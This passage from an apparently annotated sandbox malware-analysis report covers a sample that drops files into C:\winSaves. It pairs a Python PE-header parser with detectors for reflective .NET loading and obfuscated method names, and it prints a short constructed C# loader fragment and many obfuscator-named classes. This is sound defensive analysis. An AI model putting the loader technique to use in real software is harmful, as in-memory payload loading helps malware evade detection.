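    coff = pe_off + 4
    machine, nsec, _, _, _, opt_size, _ = struct.unpack_from("<HHIIIHH", data, coff)
    opt = coff + 20
    magic = struct.unpack_from("<H", data, opt)[0]
    if magic == 0x10B:                     # PE32
        ndirs_off, dirs_off = opt + 92, opt + 96
    elif magic == 0x20B:                   # PE32+
        ndirs_off, dirs_off = opt + 108, opt + 112
    else:
        raise ValueError("unknown optional header magic 0x%x" % magic)
    dll_chars = struct.unpack_from("<H", data, opt + 70)[0]   # same offset in both formats
    ndirs = struct.unpack_from("<I", data, ndirs_off)[0]
    sections = []
    sec_table = opt + opt_size             # section table follows the optional header
    for i in range(nsec):
        name, vsize, va, rawsize, rawptr = struct.unpack_from("<8sIIII", data, sec_table + 40 * i)
        sections.append({"name": name.rstrip(b"\0").decode("ascii", "replace"),
                         "va": va, "vsize": vsize, "rawsize": rawsize, "rawptr": rawptr})
    directories = {}
    for i in range(min(ndirs, len(DATA_DIRECTORIES))):
        rva, size = struct.unpack_from("<II", data, dirs_off + 8 * i)
        if rva or size:
            directories[DATA_DIRECTORIES[i]] = {"rva": rva, "size": size,
                                                "section": section_for_rva(sections, rva)}
    flags = [n for bit, n in sorted(DLL_CHARACTERISTICS.items()) if dll_chars & bit]
    return {"machine": machine, "dll_characteristics": flags,
            "sections": [s["name"] for s in sections], "directories": directories}


def build_constructed_pe32() -> bytes:
    """Header-only PE32 image with a section layout like the report's sample.
    All addresses and sizes are invented for this example."""
    secs = [(b".text", 0x1000, 0x40000), (b".rdata", 0x41000, 0x10000),
            (b".didat", 0x51000, 0x1000), (b".rsrc", 0x52000, 0x20000),
            (b".reloc", 0x72000, 0x3000)]
    dirs = [(0, 0)] * 16
    dirs[1] = (0x45000, 0x100)       # IMPORT      -> .rdata
    dirs[2] = (0x52000, 0x1F000)     # RESOURCE    -> .rsrc
    dirs[5] = (0x72000, 0x2800)      # BASERELOC   -> .reloc
    dirs[10] = (0x48000, 0xA4)       # LOAD_CONFIG -> .rdata
    dirs[12] = (0x41000, 0x400)      # IAT         -> .rdata
    dll_chars = 0x0040 | 0x0100 | 0x4000 | 0x8000   # the four flags the report lists
    dos = b"MZ" + b"\0" * 58 + struct.pack("<I", 0x40)            # e_lfanew = 0x40
    coff = struct.pack("<HHIIIHH", 0x14C, len(secs), 0, 0, 0, 224, 0x0102)
    opt = struct.pack("<HBBIIIIIIIII", 0x10B, 14, 0, 0x40000, 0x34000, 0,
                      0x1000, 0x1000, 0x41000, 0x400000, 0x1000, 0x200)
    opt += struct.pack("<HHHHHHIIIIHH", 6, 0, 0, 0, 6, 0, 0, 0x75000, 0x400, 0, 2, dll_chars)
    opt += struct.pack("<IIIIII", 0x100000, 0x1000, 0x100000, 0x1000, 0, 16)
    opt += b"".join(struct.pack("<II", rva, size) for rva, size in dirs)
    assert len(opt) == 224                 # size of a PE32 optional header
    table = b"".join(struct.pack("<8sIIIIIIHHI", n, sz, va, sz, 0x400 + va, 0, 0, 0, 0, 0x60000020)
                     for n, va, sz in secs)
    return dos + b"PE\0\0" + coff + opt + table


if __name__ == "__main__":
    info = parse_pe(build_constructed_pe32())
    print("Static PE information:", ", ".join(info["dll_characteristics"]))
    for name, d in info["directories"].items():
        print("Data directory: IMAGE_DIRECTORY_ENTRY_%s is in: %s" % (name, d["section"]))
```

Run parse_pe over a real file's bytes to get the same view the report gives; a directory whose section comes back as None points into the headers or outside the image, which is worth a look on its own.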

            Data Obfuscation

            Source: 0.3.j0GOUGjcJD.exe.76bfb29.1.raw.unpack, VEvtpDhamCVIMfRdDDD.cs .Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
            Source: 0.3.j0GOUGjcJD.exe.6daab29.0.raw.unpack, VEvtpDhamCVIMfRdDDD.cs .Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
            Source: 0.3.j0GOUGjcJD.exe.76bfb29.1.raw.unpack, P5pBCLyC9gZ4PwvqHwd.cs .Net Code: qNl0vUOEhQ System.AppDomain.Load(byte[])
            Source: 0.3.j0GOUGjcJD.exe.76bfb29.1.raw.unpack, P5pBCLyC9gZ4PwvqHwd.cs .Net Code: qNl0vUOEhQ System.Reflection.Assembly.Load(byte[])
            Source: 0.3.j0GOUGjcJD.exe.76bfb29.1.raw.unpack, P5pBCLyC9gZ4PwvqHwd.cs .Net Code: qNl0vUOEhQ
            Source: 0.3.j0GOUGjcJD.exe.6daab29.0.raw.unpack, P5pBCLyC9gZ4PwvqHwd.cs .Net Code: qNl0vUOEhQ System.AppDomain.Load(byte[])
            Source: 0.3.j0GOUGjcJD.exe.6daab29.0.raw.unpack, P5pBCLyC9gZ4PwvqHwd.cs .Net Code: qNl0vUOEhQ System.Reflection.Assembly.Load(byte[])
            Source: 0.3.j0GOUGjcJD.exe.6daab29.0.raw.unpack, P5pBCLyC9gZ4PwvqHwd.cs .Net Code: qNl0vUOEhQ
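The two .NET findings above are the hallmarks of a reflective in-memory loader: a method handle resolved by name through typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", ...) so that native code can be called without a static import, and assemblies loaded from byte arrays through AppDomain.Load / Assembly.Load so the real payload never touches disk as a module. The "High entropy of concatenated method names" rows further down in this block are the complementary renaming-obfuscator heuristic. The Python below re-implements both heuristics as an added example; it is not the sandbox's own logic. The C# snippet it scans is constructed to resemble the finding and was not decompiled from the sample, the obfuscated method-name list is copied from one of this report's rows, the benign list is a comparison set chosen for the example, and the 4.5-bit cutoff is an assumption to tune against your own corpus.

```python
"""Re-implementation of two static .NET heuristics from the Data Obfuscation
block: reflection-based dynamic invocation / in-memory assembly loading, and
Shannon entropy of concatenated method names.  Added example, not sandbox code."""
import math
import re
from collections import Counter

# Patterns in decompiled C# that indicate a reflective loader.  The first three
# match the APIs named in this report; the rest are their usual companions.
DYNAMIC_CALL_PATTERNS = [
    r"Assembly\.Load\s*\(",
    r"AppDomain\.(?:CurrentDomain\.)?Load\s*\(",
    r"GetDelegateForFunctionPointer",
    r'\.GetMethod\s*\(\s*"',           # method resolved from a string literal
    r"\.Invoke\s*\(",
    r"Activator\.CreateInstance",
]

# Constructed C# resembling the finding; not decompiled from the sample.
CONSTRUCTED_CSHARP = """\
byte[] payload = Decrypt(Resources.blob);
Assembly asm = AppDomain.CurrentDomain.Load(payload);
MethodInfo mi = typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr), typeof(Type)});
object del = mi.Invoke(null, new object[]{ptr, typeof(Action)});
"""

# Method names copied from one "High entropy" row of this report, and a
# benign comparison set chosen for the example.
OBFUSCATED_NAMES = ["tOrENAWjb2", "e6rcQyEkQ9uWFPKXcPC", "PVQp1CEH4oHwwpBdhIA",
                    "vBr8YHEVvVDEZH4Sr0o", "RsjtAEEglDTEq7BlbQ1", "EniwZcEzFCAWGAt4PXO",
                    "QXFOlWG8PLRnhyCCcUu", "UaFPEiG75qoFG77hEG9", "XQqmJLGrKtA2fgZPGJj",
                    "gBtQvGGT1KDPp0cDWtt"]
BENIGN_NAMES = ["Initialize", "LoadConfig", "GetUserName", "ReadFile", "WriteLog", "Dispose"]


def find_dynamic_calls(csharp: str) -> list:
    """(line number, pattern, source line) for every suspicious call."""
    hits = []
    for lineno, line in enumerate(csharp.splitlines(), 1):
        for pat in DYNAMIC_CALL_PATTERNS:
            if re.search(pat, line):
                hits.append((lineno, pat, line.strip()))
    return hits


def shannon_entropy(s: str) -> float:
    """Bits per character of s; 0.0 for the empty string."""
    if not s:
        return 0.0
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in Counter(s).values())


def method_name_entropy(names) -> float:
    """Entropy of all method names of one class joined together, as the
    sandbox heuristic does; short, random-looking names push this up."""
    return shannon_entropy("".join(names))


def high_entropy_classes(classes: dict, threshold: float = 4.5) -> dict:
    """class name -> entropy for classes whose concatenated method names reach
    the threshold.  The 4.5-bit cutoff is an assumption for this example."""
    scored = {cls: round(method_name_entropy(n), 2) for cls, n in classes.items()}
    return {cls: e for cls, e in scored.items() if e >= threshold}


if __name__ == "__main__":
    for lineno, pat, line in find_dynamic_calls(CONSTRUCTED_CSHARP):
        print("line %d  %-45s %s" % (lineno, pat, line))
    print(high_entropy_classes({"IrAWjbyU2j63HAZqFFN": OBFUSCATED_NAMES,
                                "ConfigLoader": BENIGN_NAMES}))
```

Entropy on its own is a weak signal (short benign names concatenated can approach 4.3 bits), so treat a high-entropy class as corroboration for the reflection findings rather than as a verdict.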
            Source: C:\Users\user\Desktop\j0GOUGjcJD.exe File created: C:\winSaves\__tmp_rar_sfx_access_check_6481218
            Source: j0GOUGjcJD.exe Static PE information: section name: .didat (the MSVC linker's delay-load import data section; it is expected in a WinRAR SFX stub, so on its own this is a weak indicator)
            Source: C:\Users\user\Desktop\j0GOUGjcJD.exe Code function: 0_2_004EE28C push eax; ret 0_2_004EE2AA
            Source: C:\Users\user\Desktop\j0GOUGjcJD.exe Code function: 0_2_004EED46 push ecx; ret 0_2_004EED59
            Source: C:\winSaves\fontsavesbroker.exe Code function: 4_2_00007FFD9B7800BD pushad ; iretd 4_2_00007FFD9B7800C1
            Source: C:\winSaves\TGdhCspOsuwHWHVRmOneCNdUUqTS.exe Code function: 16_2_00007FFD9B7800BD pushad ; iretd 16_2_00007FFD9B7800C1
            Source: C:\winSaves\TGdhCspOsuwHWHVRmOneCNdUUqTS.exe Code function: 17_2_00007FFD9B7800BD pushad ; iretd 17_2_00007FFD9B7800C1
            Source: C:\winSaves\fontsavesbroker.exe Code function: 19_2_00007FFD9B7700BD pushad ; iretd 19_2_00007FFD9B7700C1
            Source: 0.3.j0GOUGjcJD.exe.76bfb29.1.raw.unpack, YTIqJY0j1eVbrxd6IJ6.cs High entropy of concatenated method names: '_525', 'L97', '_3t2', 'UL2', '_6V2', '_968', 'Gs5lpwB24tT5HRmg4tF', 'pNJdWkBSjDZBqUYrVYl', 'Xx8DJBB4uDZ0kohW9q9', 'rtw6OpB60yuGLMMxbru'
            Source: 0.3.j0GOUGjcJD.exe.76bfb29.1.raw.unpack, IrAWjbyU2j63HAZqFFN.cs High entropy of concatenated method names: 'tOrENAWjb2', 'e6rcQyEkQ9uWFPKXcPC', 'PVQp1CEH4oHwwpBdhIA', 'vBr8YHEVvVDEZH4Sr0o', 'RsjtAEEglDTEq7BlbQ1', 'EniwZcEzFCAWGAt4PXO', 'QXFOlWG8PLRnhyCCcUu', 'UaFPEiG75qoFG77hEG9', 'XQqmJLGrKtA2fgZPGJj', 'gBtQvGGT1KDPp0cDWtt'
            Source: 0.3.j0GOUGjcJD.exe.76bfb29.1.raw.unpack, DKgsCli9ZqoVswx7c1a.cs High entropy of concatenated method names: 'gOHBSKrKia', 'NSMBU8vNJP', 'aMuB1t6jyi', 'RFZBY1c9oF', 'sxBBOtJxsV', 'IG0FRTtmMJTKM1yRgnZ', 'KrChJOthIyJfRAaPu6O', 'h2Vg38tNdYUKjdtINom', 'EaYRsdtpsTYjJUMe63j', 'Cm3qpjtfnbw2QfAPkeh'
            Source: 0.3.j0GOUGjcJD.exe.76bfb29.1.raw.unpack, JYiKscikUePIgxqf9Pg.cs High entropy of concatenated method names: 'P29', '_3xW', 'bOP', 'Th1', '_36d', 'mVcvrU8h0L', 'FkCvp4lqsW', 'r8j', 'LS1', '_55S'
            Source: 0.3.j0GOUGjcJD.exe.76bfb29.1.raw.unpack, pVCWxx0oIogQX9AaqbX.cs High entropy of concatenated method names: 'oYo', '_1Z5', 'Obm4h1wtaw', 'qD9Ji005Ib', 'zfe4HRfELf', 'e9SLRTu2vgdpVUDAJte', 'V3oBxxuS6x1wh7Dkc8D', 'mis1wEu4YJ8l5FiUp7v', 'HjFYKhu6PFuEaYwvxUi', 'acXUmYuEf4bH9Uh4o9Q'
            Source: 0.3.j0GOUGjcJD.exe.76bfb29.1.raw.unpack, IGmJGyMXY1oqSTbfcTS.cs High entropy of concatenated method names: 'jlkwCOSU2V', 'wEIwJyk2dK', 'RHowTltc3O', '_3Gf', '_4XH', '_3mv', '_684', '_555', 'Z9E', 'cPBwtr8rEk'
            Source: 0.3.j0GOUGjcJD.exe.76bfb29.1.raw.unpack, ztOHKviCeBBHGCDaSuB.cs High entropy of concatenated method names: 'uxk', 'q7W', '_327', '_958', '_4Oz', 'r6z', 'r7o', 'Z83', 'L5N', 'VTw'
            Source: 0.3.j0GOUGjcJD.exe.76bfb29.1.raw.unpack, hF1lC408DT3R9HUQKmK.cs High entropy of concatenated method names: 'CvGH69B6fE', 'J4eHW2k2oO', 'cjcHbmnGoV', 'lHsHu3Za6n', 'f32H2nl73B', 'Pf9cjtxQECwAjHtXbGp', 'giKkAtxaMtu9SMJATlW', 'nep89AxlXxSBRPDUUHj', 'qde8dFxMvWEcTcaVuUK', 'x83Q38xFvTuT8C1oF9u'
            Source: 0.3.j0GOUGjcJD.exe.76bfb29.1.raw.unpack, gxrRgMeorFXSoFDpcY7.cs High entropy of concatenated method names: 'knIyTZ3daP', 'jXMytQGVsU', 'Xe5LOG1saUt1fYyfeYD', 'jWen5V1UnUo0GVv5Xna', 's39DVu11wZ1ZcXuGjLX', 'yw2NTF1vN959cErCm4L', 'Aq4Om812YEtcRDJ3dU9', 'cwNSMZ1S0KPtuZMqCru', 'GsViTC14dm8FIw9BRpf', 'PYoVvd16Fu3N8IHDtvX'
            Source: 0.3.j0GOUGjcJD.exe.76bfb29.1.raw.unpack, mWwphpeThZ87UhTlqEp.cs High entropy of concatenated method names: '_6U6', 'YZ8', '_694', 'G9C', 'OrwE07aI6c10sVvL1uk', 'IIhyBta3OR4xMw6A3oR', 'PBj2SMaDDMHJrqu4ysT', 'UG0sNCaxNnUl7kaKXXe', 'jHBb5BaBtjWY9mQL4iN', 'EkP1H0auJbKk3UfPL4B'
            Source: 0.3.j0GOUGjcJD.exe.76bfb29.1.raw.unpack, sCTOb30BtBftHsFVIBF.cs High entropy of concatenated method names: '_223', 'DZ5Z1XDGI7hFxGiAu0u', 'J17PueDnVd2kD9kvoas', 'pCAgknDILbaEs69WuWd', 'LHZfQJD3APD3NoKhmsy', 'iuY3qWDDAFTtNZ2UgRD', 'PqDpcsDxJQalTBvpCHV', 'wAuX4MDBjrnertBpkhw', 'XF8RojDufKIGk2dmgU4', 'F0Rv8wDeXR9cWQr05is'
            Source: 0.3.j0GOUGjcJD.exe.76bfb29.1.raw.unpack, tw3uV20WNb3pBo2MPoT.cs High entropy of concatenated method names: '_269', '_5E7', 'l2L4vZC7Mn', 'Mz8', 'wdc4pr8LwU', 'US6mXBuWWyesswptFJJ', 'wwbpiXuKYM5PP9ZMpag', 'kMID2Uu5wIFtvkTfC5t', 'xVantfuJ3wh7aCaJ4je', 'oY5ut6uVeCGiDeHjANx'
            Source: 0.3.j0GOUGjcJD.exe.76bfb29.1.raw.unpack, oQwaQDy79UxMreBOJlg.cs High entropy of concatenated method names: 'MgyMH7P58I', 'CHtMCZVfVe', 'jYLvyvGJLmlweyH2XY5', 'wuL46iGVaRSfChycvMA', 'zOEQBJGKGj8Zux3qmbl', 'bpZm4BG5AevQrmwe4vw', 'xV6MqxAfpi', 'eQXWTMn8BLJCjaWDlp0', 'WNJ8ytn7KDCFsFs7YrP', 'zQQV1sGH5cjYlKfheHG'
            Source: 0.3.j0GOUGjcJD.exe.76bfb29.1.raw.unpack, wZueKEMgkhE4fHDZjM3.cs High entropy of concatenated method names: 'hBamGmStSs', 'VI8moSDgah', 'hdgmVgr6Pg', 'D30mnnnYpB', 'mdImkPEQPj', 'OJkmxE7qTt', '_838', 'vVb', 'g24', '_9oL'
            Source: 0.3.j0GOUGjcJD.exe.76bfb29.1.raw.unpack, RLuMWMOPfEsJxSeuIO.cs High entropy of concatenated method names: '_59M', 'YZ8', '_1zA', 'G9C', 'N88AafThRrWLoYLFvbX', 'lhPVtvTfMPI30cIHmZN', 'ckw508TcTmh1tP0Auuv', 'K9RTEfTRaftlmYvOYVI', 'GM0qEqTbqJ49Mu5obDW', 'yQ9rTWTOifknXwPZcru'
            Source: 0.3.j0GOUGjcJD.exe.76bfb29.1.raw.unpack, QXq41HycBrhgHtYJ4cs.cs High entropy of concatenated method names: 'sfFi9g2U40', 'zEMij6Lksp', 'cW1icHGF9F', 'heIis6vdht', 'JYDiAlJaF3', 'TM0wXb68BUUNgXittpZ', 'RF3mXO67N0HvUQmwVWd', 'OJHcpm4HhZYIi2qXg8L', 'Nr3Cpl4zyT5DClFQw3N', 'zxx8O66reBIfqVDEGrF'
            Source: 0.3.j0GOUGjcJD.exe.76bfb29.1.raw.unpack, UvJjcnemtsB0WRGwyAX.cs High entropy of concatenated method names: 'p23', 'YZ8', 'Gog', 'G9C', 'PX4JXtFYEjZGgXhDntJ', 'KJUumOFP9amk16Jx3ek', 'JDYyxfFZeSJcJGTLOGM', 'Mx07NCFoFlamAJl3JEj', 'gCcNvkFWc6A2vHqGXeI', 'nHpHOjFKwC1NHVB3aYe'
            Source: 0.3.j0GOUGjcJD.exe.76bfb29.1.raw.unpack, n6DPc3idAX7NuvwTUHl.cs High entropy of concatenated method names: '_7zt', 'p1oBKO63NN', 'Tk0BR9fjF5', 'YLrB9NntlN', 'CNCBjD3vmx', 'Kf1BcHWvor', 'm0mBsMrxg9', 'l9dpHmtBno12MmtYbYl', 'xHZIg3tufVVDNPg5yDh', 'yPwcfstDP70iIR9oyL2'
            Source: 0.3.j0GOUGjcJD.exe.76bfb29.1.raw.unpack, XjGv6fesuIQg7Bdnfmn.cs High entropy of concatenated method names: 'kNf', 'YZ8', 'U31', 'G9C', 'L9wCaRFmDPU81ylmnbH', 'k0qdRZFhd6XOaq8WgAp', 'GqFg4sFfMl2myUNfLZS', 'P4vfNQFcoLxHBAUbcc8', 'hNG5EpFRQwrCD82YcQ4', 'YwypsSFbQIhrGTnL1Ef'
            Source: 0.3.j0GOUGjcJD.exe.76bfb29.1.raw.unpack, qv3rggWCH4OK9ngk8J.cs High entropy of concatenated method names: 'pHw', 'YZ8', 'v2R', 'G9C', 'N8mXiOMi5S6J6qgH5x4', 'p9UHk1MXC1feQoUxtBW', 'xBQPJIMqNMm9QIQu6be', 'J0Ynn2M9XVfFgIQt9K9', 'lOcUAQMAbHfsLcqoXBk', 'kXF9KIMNXfESrPfVTRe'
            Source: 0.3.j0GOUGjcJD.exe.76bfb29.1.raw.unpack, kSQf2jhmB6aPurDa5Qq.cs High entropy of concatenated method names: 'yBKQAGQ1wI', 'r9pQmbDp7y', 'PC8QIy4TKP', 'gxaQwyqUIw', 'gC5QlXw4bG', 'HWbQXxLmwS', 'g4qQN6x4dQ', 'nFbQPPZR16', 'RCVQQWj7t7', 'oBvQ48JPfK'
            Source: 0.3.j0GOUGjcJD.exe.76bfb29.1.raw.unpack, Y5hnmK1OvBTNKdRk7r.cs High entropy of concatenated method names: '_3OK', 'YZ8', '_321', 'G9C', 'MnmwJ6rkH1CT23Uf8RR', 'cTH3cJrHIZXHWBs9qMH', 'LFHOlGrzworoebGsVYF', 'CXc2NXT8vy3aGIZaXcj', 'jfOLR1T7cQiARmb16yJ', 'yCt1t8TrAWFy2grZyR6'
            Source: 0.3.j0GOUGjcJD.exe.76bfb29.1.raw.unpack, fwYwnB0vLdV8GHhpFUg.cs High entropy of concatenated method names: 'GWOHZ9EcnR', 'WbbH3Im8Au', 'NEiHGkpes9', 'ztOHoHKveB', 'Pjhk6oDpEY5peDCmUS5', 'cQb9oODmpCcIMBAmDZt', 'IyiWT4DhSyiw27mUU62', 'jtPrDyDApMPtJ21UKo9', 'hRopUdDNj5rlQl44kIr', 'jtE3D6DfjRSQ9hEvdIL'
            Source: 0.3.j0GOUGjcJD.exe.76bfb29.1.raw.unpack, Rs4xwdeEP6afc5hWLp4.cs High entropy of concatenated method names: 'K55', 'YZ8', '_9yX', 'G9C', 'MPNYOKQjsG0XZFSN5xv', 'CWjKe2QY8Yn3wIQVtX9', 'iLCkcpQPKMb4pYTaRVk', 'r3RBkDQZd7DLQxqRil7', 'zbjuRIQoiqXdgfwswB0', 'nlCb34QW68u3jkPSTPh'
            Source: 0.3.j0GOUGjcJD.exe.76bfb29.1.raw.unpack, ptkLbC0KAelfTu6MyGv.cs High entropy of concatenated method names: 'wLsCrIYiPK', 'asCCplZqoV', 'vwxCq7c1aF', 'sNr6R9xLjKr3g0C61tW', 'emeTlgxOcqjZuRfcfOQ', 'f80Fw1xwT6PU7Ipf7Kr', 'POtbRLxC6rlQf5iDVCF', 'gcuCMTTaQl', 'QG9Chgs1Wm', 'Y94CH8CVmH'
            Source: 0.3.j0GOUGjcJD.exe.76bfb29.1.raw.unpack, ic5fTEiuuYMoMMo3YnE.cs High entropy of concatenated method names: 'ixkrmqtnNU', 'Td8rwbTuJF', 'pxAratE0Ek', 'IF2rvFI6A4', 'hBXrr4jZti', 'wblrpRRy5F', 'y82rqjensG', 'ylpr8we37X', 'Q9trdlm0Oh', 'rdprK5Z6ft'
            Source: 0.3.j0GOUGjcJD.exe.76bfb29.1.raw.unpack, Na6nh3iB2nl73BO9fiH.cs High entropy of concatenated method names: 'aJ3t1PJNkZ', 'YBQtYpfG16', 'ijUtOm8wMp', 'xnrtDwANqP', 'fC5t7cURIy', 'EY1K6VyHSe8h6eEx4Mk', 'BdQNXNyzwL9BGE1Skac', 'YJa5wSygQqAvWGu5Tsr', 'ExhCamyk7f7FfrPEwZT', 'UB8BTGt8mnJfZJSgyW7'
            Source: 0.3.j0GOUGjcJD.exe.76bfb29.1.raw.unpack, sxWA4nyRYbyEGUHWOtD.cs High entropy of concatenated method names: 'nIdia1WbMc', 'lRjivFJ3rD', 'UcMEC44edEfXqu2cPMB', 'pmEntd4ydYfpO91Mrn4', 'mS8F5H4BRcD0dXcVC9d', 'ftVL4b4uyMFmlqaM2Vy', 'UKGypj4tU50qTT311sL', 'kiKa734dnYYC3hbIDPI', 'HQVsXP4i378BnJLQgsI', 'Xa8YrX4XgDJCHd5VhOb'
            Source: 0.3.j0GOUGjcJD.exe.76bfb29.1.raw.unpack, nfZZTLE6rUQouVJMh4U.cs High entropy of concatenated method names: '_14Y', 'b41', 'D7Y', 'xMq', 'i39', '_77u', '_4PG', '_5u8', 'h12', '_2KT'
            Source: 0.3.j0GOUGjcJD.exe.76bfb29.1.raw.unpack, IYxses0nellwLQgrhDh.cs High entropy of concatenated method names: '_9YY', '_57I', 'w51', 'XQl4JI3R84', '_168', 'JoIfnhuymATKpSwZ1pj', 'ym2nL5utnnd6EebdKhs', 'WyWX7cudKLjTroHtHcV', 'IqrJ4Cui4007iW3DcTQ', 'u46FS7uX6jPOwxONFGK'
            Source: 0.3.j0GOUGjcJD.exe.76bfb29.1.raw.unpack, AgvJYSyqHjf7hJAC3R8.cs High entropy of concatenated method names: 'drE0F6JG2a', 'gPJ05Qlsps', 'eMMNOmSIZc3C12rAbNP', 'cFaSLjS35MBjwElQCER', 'dvqg78SDJmt8om3vQHR', 'FWa7MQSxHdsrQxcbgXg', 'amEZp0SBnmFooRndknV', 'b9hrijSu3Gqg7YOBJGi', 'CFSD62SeRhg0uCSEdji', 'gdhc6jSynvrbgnX8pK6'
            Source: 0.3.j0GOUGjcJD.exe.76bfb29.1.raw.unpack, baLgiuECnZgxsetJ0M8.cs High entropy of concatenated method names: 'tMLARcb1D2', 'CEWA9p1egT', 'ELOBKyh5mATWKU65aEY', 'e5YM8OhJpkUUp6MYtWK', 'ruor57hVK9N9hnEsTOZ', 'xJHnN6hgatUGLlcmho0', 'cv6T2fhkIKSftqMoaWL', 'apOkenhHcXTJj3Y719t', 'es3W6IhzDC3STyEYudg', 'xCGypff8d6c5Ida0Qib'
            Source: 0.3.j0GOUGjcJD.exe.76bfb29.1.raw.unpack, KmuRKWe5cqVDY4b6GWn.cs High entropy of concatenated method names: 'i85ycXH1N8', 'u0sysKgFCL', 'RawyAdD2Em', 'RZNGbQs1lxEykNE8dMf', 'vVxFjUs0wefNCM4ZLN8', 'fEKcvMsU2PlPbeSa3Kj', 'jBvnUyssgHHansYiJTi', 'NOS9agsvAA2qgCn7mdG', 'tktmF4s27d4vxYpBdMJ', 'yoqTLZsS5wThxwyeHdB'
            Source: 0.3.j0GOUGjcJD.exe.76bfb29.1.raw.unpack, BFy9gblBLgiB7OV0py.cs High entropy of concatenated method names: 'T43', 'YZ8', '_56i', 'G9C', 'V3YOP5r1hiSli96wyQa', 'Ko5uLjrsQFoM5xZreLP', 'LP4D5mrvZNTsVH7fbbq', 'LHqyuar2DTNaVWQqpIv', 'HYmQDDrShUI8VCPCks4', 'HrYOMar4rIEwfb2cb2A'
            Source: 0.3.j0GOUGjcJD.exe.76bfb29.1.raw.unpack, Bw9RUiepggVU4DXp16r.cs High entropy of concatenated method names: '_981', 'YZ8', 'd52', 'G9C', 'NJQ4fxaKEffTJjPH6Cf', 'LONxLBa5h2G0IROFr6b', 'GgaABNaJS5f2nTxsWae', 'IA6vo8aVusPyFSttqbk', 'bm3VSUagNQBFsGAeMyC', 'G7QV4xakv9wdN6CRZ8y'
            Source: 0.3.j0GOUGjcJD.exe.76bfb29.1.raw.unpack, sD2r5A0ApQY7XlJi3Kt.cs High entropy of concatenated method names: 'nnqC465Sq2', 'k6cCSyk0jO', 'GAwloSBnlPrbZqMxxVI', 'aVMBgbBIquK36r63MdJ', 'HY9cggBExd8QbsaVuYv', 'zJMOrLBGRAkqqMB4cSd', 'pVPwD9B3TGU3waexpIp', 'Qai357BDsDyyLq5PUXX'
            Source: 0.3.j0GOUGjcJD.exe.76bfb29.1.raw.unpack, yMrGjyeOxRrRbSTpXGl.cs High entropy of concatenated method names: 'FgdeFelL3n', 'KEBAZxUf5QmW7NDqNVU', 'O3WIsyUcUiNGjDJZABw', 'sIfNMQUmb3jliFZDi6p', 'uMTvEnUhxnuUS13sSFP', 'KvxC6fURsH6QYaxbYC2', '_3Xh', 'YZ8', '_123', 'G9C'
            Source: 0.3.j0GOUGjcJD.exe.76bfb29.1.raw.unpack, SOGMhYh1pdAVKKs15U.cs High entropy of concatenated method names: 'OMhaY1pdA', 'MAJFVcN5s9f7GtGb6o', 'KdwTNB9xJLRNJW7khV', 'padXkOASB412CTqLaK', 'xVy94opJMTNnDHmZrd', 'egoE6TmnPN4hEkqUv1', 'WCQyyxvaH', 'f4800DBSG', 'e1iieI3iN', 'mW5EeWB27'
            Source: 0.3.j0GOUGjcJD.exe.76bfb29.1.raw.unpack, PFeDxNiEEYLG2Ty3uMG.cs High entropy of concatenated method names: 'Do1tqSlJYG', 'MebcYGynNO6eGOIJJhu', 'OIoHSGyIb3QnO9IMKKF', 'E9ebGdyEeAKcyq8Rw6A', 'pGNslOyGm14v5DaR3mP', 'U4TJPgf62R', 'HdJJQ6Xtks', 'JpxJ4WOlwd', 'RF2JSbCPLK', 'thLJUH3Pxy'
            Source: 0.3.j0GOUGjcJD.exe.76bfb29.1.raw.unpack, w3nOxVyyNWZxWxbxTyN.cs High entropy of concatenated method names: 'ojgyVenlSW', 'W6oyn3Jn3U', 'wFiykuOcGw', 'NZcyxKnbwA', 'lyKy6aiumv', 'wdRyWXoCPX', 'HPVAJ3vGXs0wRQBvhNN', 'nAwIyYvnkkLuSpx0J2K', 'wGmky2v6bNjGg8DhNXd', 't9SPdyvE31h8KwkS5iN'
            Source: 0.3.j0GOUGjcJD.exe.76bfb29.1.raw.unpack, zrUuAU0ufsV6bhOVQ8A.cs High entropy of concatenated method names: 'JjywHoefgi10IrXisGu', 'xFCL45ecVuP5qQnsYOO', 'KUeuBlemuR21Y8BGG0N', 'sgeNsfehi7AnmhdI4KD', 'IWF', 'j72', 'L9PJqgb0rc', 'wgxJ8vDufj', 'j4z', 'DWxJdpRVuM'
            Source: 0.3.j0GOUGjcJD.exe.76bfb29.1.raw.unpack, ve4RFFMjUketOuiapQi.cs High entropy of concatenated method names: 'OGoIRHNiTr', 'mJoI97yiEy', 'EQZIjdQGM3', 'ifNIc8CFxC', 'CBYIsWPLKB', 'by8lNHbgu30xRN4NKmj', 'p9k2NRbkg87O76FPtab', 'vGlSeXbHKL3UdDQWj3l', 'mMiGUObz2LiXJK3omua', 'F7FbbtO8NqcGVQxNBmN'
            Source: 0.3.j0GOUGjcJD.exe.76bfb29.1.raw.unpack, B8j0sKeCgFCLkawdD2E.cs High entropy of concatenated method names: '_3fO', 'YZ8', '_48A', 'G9C', 'MRHmOWaa4fVPBpxSVH0', 'JbeuSjaFOrPEFfDb1m1', 'CbLRwia001a7X2d5Wod', 'fgbHh7aUXa7bax7g59g', 'OmsEsVa1luvLQo0nSmk', 'scdtw2asxsgSiXKff7d'
            Source: 0.3.j0GOUGjcJD.exe.76bfb29.1.raw.unpack, xwyIZx7pZCQYJ9qYP7.cs High entropy of concatenated method names: '_23T', 'YZ8', 'ELp', 'G9C', 'j2lSrTTVCtIDqbdV394', 'GY925vTgtrtaCPNlPAu', 'Xnh8OSTk5pRvIimRKxL', 'y7JqQDTHPEHkkIVOQ0U', 'ejZ3hHTzQ1iWym27IBk', 'yotMGGl8XGXarcicUhb'
            Source: 0.3.j0GOUGjcJD.exe.76bfb29.1.raw.unpack, dr60aiMyIKI1JucetKW.cs High entropy of concatenated method names: 'rytIHoN6FZ', 'PU9ICKjC8U', '_8r1', 'ULuIJSOo3H', 'Pi8ITSZ9gS', 'mxlItmV4nN', 'naqIBocMtU', 'IZhqmmb61HICLdXEEmJ', 'REYUxcbE5WuJN5PnYNx', 'gFYsswbGUp9IuQF0Iby'
            Source: 0.3.j0GOUGjcJD.exe.76bfb29.1.raw.unpack, U1ZMktMwrcq80jFx7Fw.cs High entropy of concatenated method names: 'D4M', '_4DP', 'HU2', '_4Ke', '_5C9', '_7b1', 'lV5', 'H7p', 'V5L', '_736'
